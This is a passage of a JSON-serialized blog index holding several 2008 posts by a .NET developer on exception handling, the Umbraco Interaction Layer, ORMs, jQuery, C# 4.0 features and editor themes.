It really comes about from a lack of understanding of the different exception types, and when they are appropriately used. This then leads into the question I posed with this post, should you actually catch System.Exception?\nI'm of the belief that you shouldn't catch this exception. All too often in exception handling I see code like the following: try{ // do something } catch (Exception ex) { // do some exception handling } This exception handling isn't really that useful, from here all I have done is catch anything that's gone wrong, I have no opportunity to do anything unique with the different exception types nor could I appropriately handle an exception being thrown. Take email sending, web apps frequently have email sending in them and obviously you'll need have some kind of error handling. The most likely exception to be thrown is the SmtpException so when catching that you want to inform the user that there was a problem sending their email. But there are other possible exceptions like null if you didn't set all the data appropriately. But that you may want a different message to the users. If all you're catching is Exception then how do you provide a different message? But should that mean that you don't catch System.Exception? I say yes, you don't catch it, if you're appropriately catching known possible exceptions you shouldn't need System.Exception, that should be handled by the application-wide exception handling (within the Global.asax). Appropriate exception handling means actually understanding just what could go wrong and handling those senarios, not just catching everything and not really understanding what could go wrong. Moral of the story, the more you understand about what could go wrong within the application with make your life easier in the long run. ", "id": "2008-12-18-should-you-catch-system-exception" }, { "title": "I'm now on Feedburner", "url": "https://www.aaron-powell.com/posts/2008-12-15-im-now-on-feedburner/", "date": "Mon, 15 Dec 2008 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": " Well I've moved a step closer to having my entire life monitored by Google, I now have my feed monitored via Feedburner. You can find me here: http://feeds.feedburner.com/linqToAaronPowell. Anyone who is nice enough to actually subscribe to my RSS could you update to my FB link please :)\n", "id": "2008-12-15-im-now-on-feedburner" }, { "title": "What's in a name?", "url": "https://www.aaron-powell.com/posts/2008-12-15-whats-in-a-name/", "date": "Mon, 15 Dec 2008 00:00:00 +0000", "tags": [ "random", "rant" ], "description": "", "content": " Something that really annoys me is that when people don't use the correct name of a product, and by not using the name of the product completely miss what the product is for. I think that certain people do do it just to stire me up, but for example a product I do a lot of work with is RedDot CMS. But RedDot produce another product, RedDot LiveServer which is completely different in what it does.\nRedDot CMS is just a content management system, and to be honest it's one of the truest examples of a content management system. Most common CMS's really blur the line between content management and application serving. Application serving is what RedDot LiveServer is about. I'm not a fan RedDot LiveServer (for reasons which I wont go into here) but RedDot CMS I believe is a good CMS product, if you're after a CMS.\nBut I'm digressing. Another example, one which I see even more often is SharePoint. 
I can't count the number of times I've heard \"They want a site in SharePoint\" or \"Their site is built in SharePoint\".\nGreat, fantastic, what can you tell about my car if I tell you it's a Ford? SharePoint is a technology base, the SharePoint family is broken into two major components, Windows SharePoint Services (v3 is current) and Microsoft Office SharePoint Server 2007.\nAnd then within their families there are a number of different versions, depending on what is provided in the project. Similarly when I started development on the Umbraco Interaction Layer I spent quite a while thinking about what would be the name of the project. I eventually decided on UIL because of it conveys what the project is all about, providing a layer for better integration/ interaction with the Umbraco API.\nSure it has also been nick-named LINQ to Umbraco, but really the concept of a LINQ-like API for Umbraco is actually a very small part of what the UIL is all about. So next time someone comes and asked for info on how to build a site in SharePoint, or use any other ambigiously named product, just look blankly at them and ask them what said technology is! ", "id": "2008-12-15-whats-in-a-name" }, { "title": "Are ORM's bad?", "url": "https://www.aaron-powell.com/posts/2008-12-14-are-orms-bad/", "date": "Sun, 14 Dec 2008 00:00:00 +0000", "tags": [ "random", "linq-to-sql" ], "description": "", "content": " So an interesting post come up on Stack Overflow (which, if you're not into you really should be) which was on the idea of ORM's and whether why are they becoming popular. I'm a big fan of ORM's and I find that the responses in the topic are very interesting. By and large the responses from people are for ORM's, but this negative response got me thinking. The author makes a very valid point that with an ORM change release for minor change (I use the term loosly as there's never such a thing as a minor change... EVER) result in a larger deployment than you'd likely see in a non-ORM system. On a recent website I worked on we had several instances where we had to do entire DAL releases (which the ORM is obviously built into) just for minor but system-critical changes.\nThey may have only been a handful of code lines that were updated but to get the changes released it required a lot more work. You needed to get an environment into a production-mirror state, local the appropriate label in source control, branch, make change, test, release. Admittedly the majority of these steps are required each time but with a sproc change you ultimately have less dependancies, so the chance of a major fuck up is drasticly reduced. That said, I am a huge fan of ORM's, I'm a really big fan of LINQ to SQL and I think it's possibility for use within a DAL is high (as implied here). I've used several different ORM's in my time, with different levels of code generation. I like LINQ to SQL as it doesn't actually add anything to the SQL server (which also makes unit testing a snap!). We had an in-house tool that we used for quite a number of years which generated .NET classes from your tables and a series of sprocs to handle most CRUD operations. It too was good, but it ultimately lead to what I believe the fundimental mistake that happens with ORM's - the spread of business logic. Often with projects you'll have people who are really good at SQL, and you'll have people who are really good at .NET. 
And more often than not you'll end up with them coding their business logic into their preferred language.\nSo you end up with some of the business logic stored in the database and the rest stored in code files.\nThis then poses a maintenance nightmare. Depending on your security practices it may not be possible to debug the sprocs from VS, or the developer maintaining may not understand .NET as well as the original author. I'm someone who's not great on SQL, I can get myself into and out of most trouble on a standard project, but when it comes really complex components I'd much rather write a few delegates and have my ORM handle it than try and achieve it in SQL.\nAnd any half-decent ORM should be expected to translate the code-based queries into the underlying language of choice. ORM's are here to stay, there's no doubt about that and i believe they offer a great advantages in development time and provide a good medium for proper logic abstraction within a project. ", "id": "2008-12-14-are-orms-bad" }, { "title": "Microsoft Ajax <3 jQuery", "url": "https://www.aaron-powell.com/posts/2008-12-13-microsoft-ajax-hearts-jquery/", "date": "Sat, 13 Dec 2008 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": " All ASP.NET developers should know by now that Microsoft is officiall supporting jQuery as part of Visual Studio 2008 (and beyond). Well I've finally got to doing a project where I'm doing some very heavy AJAX implementations, and since it's a .NET build MS AJAX is already part of the loaded scripts, so I'm using jQuery in a supplimentary manner. And loving it! The jQuery vs-doc file makes life a so much easier, full intellisense support with code documentation. Writing ASP.NET client controls that use both MS AJAX and jQuery is a snap too. When using Sys.UI.Control it's very simple to get a jQuery reference for the current control (psst - var j = $('#' + this.get_element().id)). And the future is looking even more exciting - http://weblogs.asp.net/bleroy/archive/2008/12/09/microsoft-ajax-client-templates-and-declarative-jquery.aspx. Client side templating, ASP.NET back-end power, the future of AJAX development with ASP.NET is looking very exciting! ", "id": "2008-12-13-microsoft-ajax-hearts-jquery" }, { "title": "Don't you worry about Planet Express, let me worry about blank", "url": "https://www.aaron-powell.com/posts/2008-12-11-dont-you-worry-about-planet-express-let-me-worry-about-blank/", "date": "Thu, 11 Dec 2008 00:00:00 +0000", "tags": [ "umbraco", "Umbraco.InteractionLayer", "linq", "asp.net" ], "description": "", "content": " Well avid reader I'm sure you are able to work out what the title is in reference to (bonus points if you got the episode right). Well there is a bit of a reason for it, but it's really just a show of how massively nerdy a life I lead. Since I've started developing the UIL I've been asked a few times what is the point of it. Most obvious one was from Warren Buckley when I released Beta 1. So just what is the UIL and why should you use it? First, some background To really understand the point behind the UIL you really need to look at why I started it to begin with. 
Other than the shear thrill of the challange I did actually have a valid reason (well, one which is valid enough in my own mind).\nAnyone who has done a lot of coding against the Umbraco API will be familiar with it's limitations, and those who haven't, well think about this.\nYour standard DocType has around half a dozen properties on it and these properties can have all kinds of use, depending on the purpose of the DocType. A lot of sites I've worked on have had a \"data\" tree of some sort. A content tree in Umbraco which contains items which are never navigateable to, items such as: News Form field data Galleries etc Programming aginst these using the standard Umbraco API isn't a problem when you're looking for a basic key/ value pairing between the ID and Text properties of the DocType, but what if you've got additional properties you want to access via code? Sure you have a doc.getProperty(string) method, but what does it return? It returns a property, which you can get the value from in the type of System.Object. So then you have to cast it into the actual type, but low-and-behold you may have DBNull.Value in there because no data has been entered in the system! So you write a check around it, you maybe write a generic checking method so you can reuse it in multiple places, and so on. I did this, many times (you'll actually seen an early implementation in my post Extending Umbraco Members) and I figured there had to be a better way.   Additionally I always had the goal of writing LINQ to Umbraco. Anyone who's read most of my posts (or has the pleasure *sic* of working with me) will know I'm very passionate about LINQ and what it can provide. Last year I had a chance to meet Niels and this was around the VS 2008 release, LINQ was a real buzz word and I chatted to him with the concept of a LINQ to Umbraco, something he seemed very fond of. And although it's very basic in its current incarnation (due to API restrictions) I'm quite happy that there is now a LINQ to Umbraco implementation available, and that I'm part of it. How can the UIL help your (Umbraco) life? So now that I've given some background about why I wanted to produce the UIL, how can it help you? It's all well and good for me to write something which will suite my needs perfectly but can it actually be usable for anyone else? The goal of the UIL is to act as a bridge between developers and the Umbraco API. The UIL is very much a developer tool, if you're not planing on writing and .NET code then sorry, it's not really of use to you (other than a purely achedemic excercise). But if you are writing .NET code and you want to interact with Umbraco nodes then this is the tool for you! All UIL-generated objects have both a parameterised and parameterless constructors for the ability to do the following: Constructing new CMS documents Opening existing CMS documents from the ID Opening existing CMS documents from the Unique ID (GUID) Opening existing CMS documents from an existing CMS node (only supported as part of the partial-class implementation, it's a protected constructor) All data is imported from Umbraco when the constructor is used so there is full access to the data as it would be in Umbraco itself (or viewed on the page). UIL-generated objects also provide the standard features you would be expecting on a document such as: Save Publish Unpublish So really UIL objects (in theory) will provide all the interaction that is required from a developer. 
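To put that side by side with the getProperty dance from earlier, here's a hedged sketch. The first half uses the raw Document API as described above (the property alias is made up); the second half uses a hypothetical UIL-generated class called NewsItem, whose name and Title property are invented for the example, since your generated classes will be named after your own DocTypes.

using System;
using umbraco.cms.businesslogic.web;

public class UilComparison
{
    public static void Run(int documentId)
    {
        // Before: the raw API, with the cast and DBNull check done by hand.
        Document doc = new Document(documentId);
        object raw = doc.getProperty("newsTitle").Value;
        string title = (raw == null || raw == DBNull.Value) ? string.Empty : (string)raw;

        // After: the same document through a UIL-generated class. NewsItem is
        // hypothetical generated output; the constructor loads the data and the
        // properties are strongly typed, as described above.
        NewsItem news = new NewsItem(documentId);
        string typedTitle = news.Title;
        news.Title = "Updated headline";
        news.Save();
        news.Publish();
    }
}

The point isn't the exact member names (those come from your DocTypes), it's that the casting and DBNull plumbing lives in one generated place instead of being repeated around the site.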
Other things, which I have mentioned in previous posts that the UIL provides are: Validation of properties against Regex Mandatory checking Event raising for PropertyChanging and PropertyChanged And of course there is the LINQ API, which provides strongly typed relationships to child items within the content tree.\nThis is really useful if you have a \"data\" structure which I mentioned earlier. The Umbraco API does provide the child relationships, but you just get back all children, so to find the ones of the type you want you must know the docType ID. The UIL will handle the type-detection on-your-behalf. As I have mentioned many a time the LINQ API is not perfect and one of its biggest limitations is that there is no way to view all children straight from the a single property. This is not planned for the v1 release. So just when should I use the UIL? Since the UIL is a developer tool there are several good locations which are common to most Umbraco developers (excluding custom development): Action Handlers Document events (in v4) Web Services Silverlight Both Per and Ruben have done good posts recently about how to use Action handlers and Event handlers (in v4) (although their posts don't really look at manipulating the document itself), and these are perfect locations if you want to modify a document during its life cycle. Web Services, particularly JSON services are another great example. The UIL classes all have a DataContract generated against them which you can be used along with the DataContractJsonSerializer to generate JSON representations of your docTypes. Great for AJAX implementations! And lastly Silverlight. Because all classes generate inherit both INotifyPropertyChanging and INotifyPropertyChanged it is possible to tie the UIL objects directly to a Silverlight app and have dynamic updates occuring very nicely.\nI'll admit this is highly experimental and i haven't actually tried it (I have done very little Silverlight dev) but I do know that in theory it can work.   Well there you have it, I hope this sheds a bit of light on the UIL and whether it is a useful tool for your needs. Stay tuned for RC 2 which will be out very soon (I found a couple of very big bugs which I'm addressing at the moment) and if you have any feedback, comments, abuse, bugs or feature requests please feel free to drop me a line on me at aaron-powell dot com, leave a comment on my blog or raise an issue on the UIL CodePlex site. ", "id": "2008-12-11-dont-you-worry-about-planet-express-let-me-worry-about-blank" }, { "title": "Combining Paths", "url": "https://www.aaron-powell.com/posts/2008-12-05-combining-paths/", "date": "Fri, 05 Dec 2008 00:00:00 +0000", "tags": [ "generic .net" ], "description": "", "content": " Maybe I'm a slow learner or maybe this is one of those beautifully hidden features of the .NET framework but I came across a nifty little static method (thanks to this post on StackOverflow), Path.Combine(string1, string2); I can't count the number of times I'd written a method to ensure a trailing \\, and append one if it didn't exist, all because of some lack-of-knowledge. So keep this method handy in your knowledge bag for next time you are building file system paths! 
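If you've not seen it before, here's a tiny hedged example (the paths are made up) of the string fiddling it replaces:

using System;
using System.IO;

class PathCombineDemo
{
    static void Main()
    {
        string root = @"C:\inetpub\wwwroot";

        // The hand-rolled way: worrying about the trailing slash yourself.
        string manual = root.TrimEnd('\\') + @"\App_Data\uploads.config";

        // The framework way: Path.Combine sorts the separator out for you.
        string combined = Path.Combine(root, @"App_Data\uploads.config");

        Console.WriteLine(manual);   // C:\inetpub\wwwroot\App_Data\uploads.config
        Console.WriteLine(combined); // C:\inetpub\wwwroot\App_Data\uploads.config
    }
}

One small gotcha worth knowing: if the second argument is itself a rooted path, Path.Combine just returns it, so it isn't a blind string concatenation.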
", "id": "2008-12-05-combining-paths" }, { "title": "Umbraco Interaction Layer - RC1", "url": "https://www.aaron-powell.com/posts/2008-12-05-umbraco-interaction-layer-rc1/", "date": "Fri, 05 Dec 2008 00:00:00 +0000", "tags": [ "Umbraco.InteractionLayer", "umbraco" ], "description": "", "content": " Well I've gone and beaten the Umbraco guys to RC1, although I'm sure v4 RC1 is just around the corner. But, none the less I'm happy to have RC1 of the UIL ready for download. There's actually very little changed between Beta 1 and RC1. There's a little bit of a code clean up, and I've addressed a bug which was found by a colleague of mine. She found that if you didn't generate all the Doc Types an exception was thrown if you'd omitted a Doc Type which was a child relation of anyother. Something which I had initially planned to do was produce an Umbraco package for the UIL so it was easier to install into Umbraco. I have now decided against doing so. This isn't really because I'm just too lazy to get around to it, I do actually have a good reason for this. The idea of an Umbraco package is it is something which should always be apart of the Umbraco site. The UIL is not designed for that. The UIL is only meant to be on the development version, and only for a short period of time.\nIt's the same reason you wouldn't have a DBML file on a production site, nor would you have a C# file.\nThe UIL isn't meant to be installable by knowledgable end-users. It's a developer tool and adding it should require someone who's smarter than the average bear. So although it's not a lot of changes in the code base there is actually a change in the project format, the project is now completely open source! That's right, you can now find the UIL on CodePlex :D. So you can easily check out the mess which is my source code, in all its spaghetti glory!\nYes, at the moment there is no real comments (I'm a stickler for commented code as anyone I work with will atest to).\nYes, there is a demo application in there so you can see one I prepared earlier ;). You will find the download links on the CodePlex project. Happy Hacking! ", "id": "2008-12-05-umbraco-interaction-layer-rc1" }, { "title": "Once you go black...", "url": "https://www.aaron-powell.com/posts/2008-12-02-once-you-go-black/", "date": "Tue, 02 Dec 2008 00:00:00 +0000", "tags": [ "visual-studio", "random" ], "description": "", "content": " So about 2 months ago I decided to start playing around with Visual Studio schemes to find something that was just right for dev work. I'd always been a standard VS scheme user, white back, standard colours for the fonts. The only thing I did differently was use Consolas 10pt font.\nConsolas is a beautiful font for coding in and I highly recommend anyone who hasn't tried it to get it going. It's a free download from the MS website, and I believe it's part of the Vista install. So anyway, I'm out shopping for a new look for VS, white was soo 2003 and I needed a change.\nConsidering I started my programming back in *nix with Pico and Emacs (nope, never got into vi) I grew up on the white-on-black look. I got sent this website - http://www.frickinsweet.com/tools/Theme.mvc.aspx, which is for generating VS scheme files with a few easy tweaks. With my exceptional graphics ability and knowledge of colour (I struggle to draw a stick person, and anyone who's met me knows I'm brilliant with colour from a fasion sence) I get cracking.\nAnd it was a distaster, an utter disaster. 
I couldn't make out the fonts from the horrible contrasts between the black and fluro foreground! With a quick reset of VS themes I was back on the hunt, and then I came across this - http://www.lnbogen.com/VisualStudioNet2005Colors.aspx.\nIt was beautiful, so I eagerly downloaded the theme, opened it up in VS and was pleasently surprised, it looked just as I'd hoped. I did a quick tweak to take the font size down to 10pt (I like to have a lot on the screen and smaller fonts help with that) and then I was in dark-scheme heaven. And now, 2 months on, I couldn't think of changing back to a white-based scheme. When ever I'm helping someone else and they have a white-based scheme it hurts my eyes. If you've never ventured into the relm of non-standard themes I strongly suggest you do. You don't know what you're missing out on!\nThere's a nice gallery on Scott Hanselmans blog - http://www.hanselman.com/blog/VisualStudioProgrammerThemesGallery.aspx or if you prefer to get really nerdy, check out the IDE hot-or-not! http://idehotornot.ning.com/ ", "id": "2008-12-02-once-you-go-black" }, { "title": "Mocking with SharePoint", "url": "https://www.aaron-powell.com/posts/2008-11-25-mocking-with-sharepoint/", "date": "Tue, 25 Nov 2008 00:00:00 +0000", "tags": [ "sharepoint", "unit-testing" ], "description": "", "content": " So while going through my blogs I came across one about a new mocking framework specifically designed for unit testing within SharePoint. The blog can be found here and from their website they have several demos of using Isolator for SharePoint mocking. I'm interested in having more of a play with it, and Typemock are offering a free license for so: Typemock are offering their new product for unit testing SharePoint called Isolator For SharePoint, for a special introduction price. it is the only tool that allows you to unit test SharePoint without a SharePoint server. To learn more click here. The first 50 bloggers who blog this text in their blog and tell us about it, will get a Full Isolator license, Free. for rules and info click here. But I do wonder about the overall benefit of Isolator. Without playing with it I can't make any conclusions but I've always found mocking can be a dicy subject, particularly if you're mocking something which can have an impact on the underlying operation of the code\nAnd that is a concern about mocking the SharePoint API. I'm am a fan of RhinoMocks and have played with it and found it really useful when I was stubbing up interfaces, but I never took it to the level of mocking up full API-level components (although I really do want to get around to trying it to get around some of the limits of the Umbraco API!). I'll try and do some more investigation on Typemock's Isolator for SharePoint and see what I can find. If it really does what they say it does it could make it easier to develop SharePoint API-prototypes without the need for a SharePoint environment.   ", "id": "2008-11-25-mocking-with-sharepoint" }, { "title": "Umbraco Interaction Layer - Beta 1", "url": "https://www.aaron-powell.com/posts/2008-11-19-umbraco-interaction-layer-beta-1/", "date": "Wed, 19 Nov 2008 00:00:00 +0000", "tags": [ "Umbraco.InteractionLayer", "umbraco" ], "description": "", "content": " Well loyal readers I am proud to announce the release of the Umbraco Interaction Layer... Beta 1! Yep that's right, I've completed my primary set of features and now it's just a matter of testing and a full testing and v1 will be out the door. 
This release brings a few new features, it also brings in a few breaking changes from the preview releases. An as with Preview 3 this release supports Umbraco v3 and v4 (although it's only been tested againt v4 Beta 2 Take 2, but from my understanding of Take 3 there are no changes to the API sections the UIL relies upon). So what new features can be found in Beta 1? User specified namespace More Umbraco API pass-throughs Unpublish Delete User specified namespace This was a feature I have been wanting to put into since the earliest version of the UIL but it'd been on my back list of features. Well it's in there. Finally. More Umbraco API pass-throughs So in an effort to make the UIL code a complete replacement for the Umbraco document API (sorry Umbraco guys, it's nothing personal ;)) I have added a few more pass throughs, now you can access the user who created the document, unpublish and delete. Yep, finally I have complete CRUD supprt, not just CRU which it has been since Preview 1. Notification of generation complete   Yeah this was something else on the \"things I had to do\" list, now when you generate your code you'll get a lovely little Umbraco bubble to tell you that it has completed. Aww aint it pretty! Breaking changes As I mentioned there are several breaking changes in this release, these are just around the settings for the UIL generator and the UIL generated code. Previously I was using the appSettings collection for some of settings but now they have been promoted to their own settings section. There is an included config file in the Beta 1 packages which shows it's use. Also I have included a config section for the User ID of the user responsible for the creating of new nodes and the publishing of nodes. These are newly exposed properties within the generated UIL code. This just gives more control over the data that is ultimately visible from within the CMS. And to finish it off here are the links: UIL Beta 1 for Umbraco 3 UIL Beta 1 for Umbraco 4 ", "id": "2008-11-19-umbraco-interaction-layer-beta-1" }, { "title": "Maintaining client sessions", "url": "https://www.aaron-powell.com/posts/2008-11-13-maintaining-client-sessions/", "date": "Thu, 13 Nov 2008 00:00:00 +0000", "tags": [ "ajax", "asp.net" ], "description": "", "content": " In my recent blog browsing I came across an interesting post from Joel at See Joel Program on maintaining an ASP.NET session within an AJAX application. It's a very good post and a very good solution Joel has come up with. I'm a big fan of Joel's work, I love the client event pool, it's such a useful way to have cross-eventing in RIA's. In the end of his post though he states that it's not an overly useful solution and that you can increase the session timeout rather than using client eventing to refresh the session.\nTo an extent I do agree with this, really short timeouts and then constantly refreshing the session isn't a good solution, you don't get any real performance increases. But I can see a good use for timed-session refreshing. A lot of the project I work on are CMS heavy projects. We'll have a big CMS backed with functionality dotted all around the place.\nRecent I worked on a website which has a login component to it, it's built on top of Umbraco and we used the Umbraco membership provider.\nWhen logging in we use the session to store the logged in information (the Umbraco members do support cookies but we wanted a really short login period plus the cookies login has a few problems). 
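To give a rough idea of the approach (the key name and the idea of storing just the member id are assumptions for this sketch, not the site's actual code):

```csharp
// A minimal sketch, inside a System.Web.UI.Page: stash enough in session at
// login to know who the member is, and treat a missing key as "logged out".
// The key name and method names are illustrative only.
protected void OnLoginSucceeded(int memberId)
{
    Session["currentMemberId"] = memberId;
}

protected bool IsLoggedIn()
{
    return Session["currentMemberId"] != null;
}
```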
So we need to ensure that the session stays active. There's some very content-heavy sections of the site so we don't want people to be reading stuff and then go to navigate away only to find themselves logged out.\nWe combated this with a large session timeout. This means we do have additional presure on the server to cater for the scenario where a page is left active for a long time. Generally speaking people move around a site very frequently so the session is constantly being kept alive by postbacks and new requests, so we're really adding load for the small percentage. This is an example where I think that Joel's solution is a good idea as it can allow for an unobtrusive keep alive on these kind of pages.\nIt would also mean you can have a more appropriate session timeout and use the nature of the site (frequent movement) to do the standard session keep alive. I like this solution from Joel, it's a good example of how you can keep active servers from a client. It's also a good example of the power of a client event pool. ", "id": "2008-11-13-maintaining-client-sessions" }, { "title": "Umbraco Interaction Layer - Preview 3, take 2", "url": "https://www.aaron-powell.com/posts/2008-11-11-umbraco-interaction-layer-preview-3-take-2/", "date": "Tue, 11 Nov 2008 00:00:00 +0000", "tags": [ "Umbraco.InteractionLayer", "umbraco" ], "description": "", "content": " Well I release the UIL Preview 3, and in my work to support Umbraco v4 Beta 2 I found a change with the GetAll property signatures. As you may notice reading the comments in my blog post the long-reaching effects of the change were not really considered and it actually resulted in a lot of breakages! Well the Umbraco team has release Umbraco v4 Beta 2, Take 2 which corrects the issue, but subsequently left the UIL not working in the latest official v4 release! So I've updated the UIL and celebrated it with a Take 2 release of my own. This release is just a recompile of the v4-targeted package, if you want the v3-targeted package use the original UIL Preview 3 release. ", "id": "2008-11-11-umbraco-interaction-layer-preview-3-take-2" }, { "title": "Umbraco Interaction Layer - Preview 3", "url": "https://www.aaron-powell.com/posts/2008-11-06-umbraco-interaction-layer-preview-3/", "date": "Thu, 06 Nov 2008 00:00:00 +0000", "tags": [ "Umbraco.InteractionLayer", "umbraco" ], "description": "", "content": " In between the time spent packing and unpacking while moving house I've been working on my next release of the UIL, and I'm happy to say that it is ready and it is exciting. There is a breaking change between Preview 2 and Preview 3, but there are also a few new juicy features. Breaking changes The biggest breaking change with Preview 3 is that I have removed the interface IDocType. While working on the UIL I came to realise that having both an abstract base class and an interface was some-what redundant. When ever downcasting is needed it should always be done to the base class, so I have removed the interface to avoid confusion. Another major change is the dependencies of this release, no longer is the generated code supporting .NET 2+, it's now only supporting .NET 3.5+ (ok, I haven't tested it with .NET 4, but I'm just guessing there :P). Juicy new bits So I said there were some juicy new bits in this release and I'm quite excited about them, so let's have a look. 
Better support for the Umbraco API I have done some work to improve the features of the DocTypeBase class to have more of the Umbraco API operations, for that I have done the following changes: CreatedDate property Now you can access the date that the Umbraco document was created Save overload method I have added an overload to Save which now mimics the Save & Publish function from the Umbraco UI  So now it is even easier to programmatically create Umbraco pages and publish them on your site! Support for Umbraco v4 Yep, that's right, I have finally got official support for the Umbraco v4 API! If anyone had been brave and tried Preview 2 in an Umbraco 4 site they would have seen the failure which ensued. Turns out that the Umbraco devs have finally upgraded all the GetAll methods to return List, not an array. A nice little change (keep in mind that Umbraco was originally .NET 1.1 so the array was probably a hold over from the pre-generics days), but it did mean that the UIL failed as the property signatures no longer matched what it was compiled against. But never fear, this release supports v4 (there are actually 2 download packages available, one for v3 and one for v4). This does not mean I am stopping v3 support, Umbraco v3 will be supported along with Umbraco v4. VB support Ok, I kind of already had this, the UIL has always been able to generate Visual Basic files, but if anyone had tried to use them well they would have seen that it didn't go so well. I'm not a Visual Basic developer, I haven't used VB for a number of years now so it was always there but I never tested it. Well it turned out that the VB files I was generating were no good at all. Preview 3 has been fully tested and now created compiling VB files! LINQ to Umbraco That's right sports fans, I now have a working implementation of LINQ to Umbraco. *cue applause* Check this shit out: HomePage home = new HomePage(1000); var textPages = home.TextPages.Where(tp => tp.CreatedDate == DateTime.Now.AddDays(-7)).OrderBy(tp => tp.CreatedDate).GroupBy(tp => tp.Keywords); (I used Lambda syntax cuz otherwise my formatting will be broken horribly). What LINQ to Umbraco is and what it isn't Ok, I need to make one thing clear, this LINQ to Umbraco implementation is not super clean. The current Umbraco API does not really support what I want to do, which means that I have had to have some hacks in place. The first thing you'll notice if you have a look at the code is that it's not really optimised. There is no query language in the Umbraco API for me to use, which means I have to rely on standard IEnumerable extension methods. So when you're accessing the child items you will be given all the items and then a filter will be applied.\nUnfortunately there isn't a way around this, not in the current API at least. That doesn't mean that this implementation isn't useful, it just means that if you're going into large child structures be aware that it may be slow and it may have a large memory footprint. Additionally I (currently) don't support the saving of child items/ adding child items to Umbraco. So if you do get an item from the collection make sure that you call Save on it.\nI am working on this and it should be ready soon for the next release. But at the very least we now have an API for Umbraco which is fully LINQ enabled and completed .NET runable. I really would love to solve the performance problem but I don't think that it can be done with the current API, not without a lot of ugly code.'   
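To picture the cost, a generated child collection can't do much better than something like this under the covers. This is a sketch against the v3-era Document API; the alias, id and exact member names are from memory and should be treated as assumptions rather than actual UIL code.

```csharp
// Illustrative only: fetch every child, then filter in memory with the standard
// IEnumerable extension methods, because there is no query language in the API
// to push the filter down to.
using System.Linq;
using umbraco.cms.businesslogic.web;

class ChildFilterSketch
{
    static void Main()
    {
        var home = new Document(1000);

        var textPages = home.Children                       // every child, whatever its type
            .Where(c => c.ContentType.Alias == "TextPage")  // type detection happens here
            .ToList();                                      // all of it loaded into memory
    }
}
```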
Downloads So if you want to check out Preview 3 make sure you grab the right one for your Umbraco: UIL for Umbraco 3 UIL for Umbraco 4 ", "id": "2008-11-06-umbraco-interaction-layer-preview-3" }, { "title": "C# 4.0", "url": "https://www.aaron-powell.com/posts/2008-10-31-csharp-4/", "date": "Fri, 31 Oct 2008 00:00:00 +0000", "tags": [ "c#" ], "description": "", "content": " As most people would know PDC is on at the moment over in the US and as usual Microsoft is showing their bag-o-tricks about what they are working on. With PDC we saw a CTP release of Visual Studio 2010, and with this brings the .NET 4.0 framework and the next incantation of the C# language, C# 4.0. I recently watched a screen cast session from PDC on the future of the C# language (link here), a session run by Anders Hejlsberg who is an excellent authority in the area of programming language design.\nI strongly recommend that you watch the session if you are interested in where C# is going as a language. Be aware it's a 70 minute session and pretty full-on in some parts. So what are the new features coming with C# 4.0? The Dynamic keyword Anyone who's done a lot of work with C# 3.0, particularly with hard-core Lambda shouldn't be surprised by this move. C# is getting more dynamic programming features built into it, through the use of a dynamic keyword. Justin Etheredge has done two good posts which look at the dynamic keywork and how it can be used. Anders also has a good demo in the screencast. For me it's a little too early to have much of an opinion on this feature, I'm definately in two minds over it. On one side I really like the ability C# is going to have to tie straight into Ruby or Python or JavaScript with next to no changes to the code, but on the flip side is brings in a greater chance of errors. ASP.NET developers are familiar with dynamic languages in the form of JavaScript, and any ASP.NET developer who's done a lot of JavaScript will tell you just how much of a pain in the arse it can be to debug. Because there's no compiler we don't know until run-time that there's a problem. Additionally intellisense suffers in a dynamic world vs a static one.\nAnd that's something I noticed from Anders talk, that when we're using the dynamic keyword in C# we loose the intellisense capabilities. Until I have a chance to actually play with it in practical scenarios I'm not going to know whether it's really a useful idea at the moment. Named and default parameters What can be said about this other than \"about fucking time!\". Essentially this means that when defining method stubs parameters can be given a default value so they are optional in use. No more writing stacks of overloads to cater for every scenario of missing parameters, now it's just a single method with the defaults flagged appropriately. Named parameters are also really nice, and to me it feels a lot like JSON parametering on methods in JavaScript. Just define the parameters to pass in and problem solved. Both of these are to a certain extent syntactic sugar. It'll be interesting to see just what the compiler generates at an IL level to see what kind of performance hit may be resulted from this. Co and Contra variants This is definitely an interesting concept and something that I'm still getting my head around. For that reason I wont go into it here but watch the screen cast for more information. From what I'm understanding of it they are going to be useful and it'll bring another level of power on top of the already awesome Generics framework. 
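To put a couple of those features into code, here's a sketch of the 4.0 syntax as presented at PDC; the method and argument names are made up.

```csharp
// A sketch of C# 4.0 optional/named parameters and generic covariance.
using System.Collections.Generic;

class CSharp4Sketch
{
    // One method with defaults instead of a stack of overloads.
    static void Notify(string to, string subject = "(no subject)", bool highPriority = false)
    {
    }

    static void Main()
    {
        Notify("someone@example.com");                      // defaults kick in
        Notify("someone@example.com", highPriority: true);  // name only what you need

        // Covariance: a sequence of strings can be treated as a sequence of objects.
        IEnumerable<string> names = new[] { "Anders", "Bart" };
        IEnumerable<object> objects = names;
    }
}
```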
Improved COM interop Ok, so not really a commonly used feature of ASP.NET but the improved COM support (some-what as a side effect of default parameters) does mean that when coding against COM, like the Office interop, will be a whole lot nicer and a whole lot more viable. C# post-4.0 So the last bit of the screen cast is Anders talking about what they are looking at with C# post version 4 and what he talks about is the compiler and it's ultimate role in the language. Anyone who reads Bart de Smet's blog will have seen he did a Channel9 video recently (and if you didn't watch it you should!) where he talked about something Anders demos. It's the concept of the C# compiler as a service. This means that you can dynamically generate C# code which is then passed to the compiler and executed on the fly. If you're not really sure what this means, check out the program LinqPad (I blogged on it last month), LINQPad opens up the compiler in a similar way, making it something that you can write code and pass to, rather than having to write code, make a DLL and execute. Compiler as a Service is a very cool concept and really opens up the ability to generate code on the fly. Less reliance on CodeDom and System.Reflection is a great idea (as I can attest to from my work on the UIL!).   The C# future definitely looks like a bright one. C# 4.0 doesn't seem to quite be the 'knock your socks off' release that C# 3.0 was but it's a move in the right direction and a very interesting one for sure. ", "id": "2008-10-31-csharp-4" }, { "title": "When == isn't equal", "url": "https://www.aaron-powell.com/posts/2008-10-25-when-equal-isnt-equal/", "date": "Sat, 25 Oct 2008 00:00:00 +0000", "tags": [ "ajax", "javascript" ], "description": "", "content": " Earlier this month I did a post about common mistakes made by developers new to JavaScript but there's a point I forgot to cover which I see a lot of. Nearly every language has a different way in which it handles equality. SQL has a single equal sign ala: SELECT [COLUMN1] FROM [Table] WHERE [COLUMN2] = 'some value' Or you have compiled languages like C# which use ==: if(someValue == someOtherValue){ } Or for some wierd reason LINQ uses the keyword equal when it does join operations... And then we get to JavaScript. JavaScript actually has 2 equality comparison, == and === (the same exists for inequality in != and !==), but 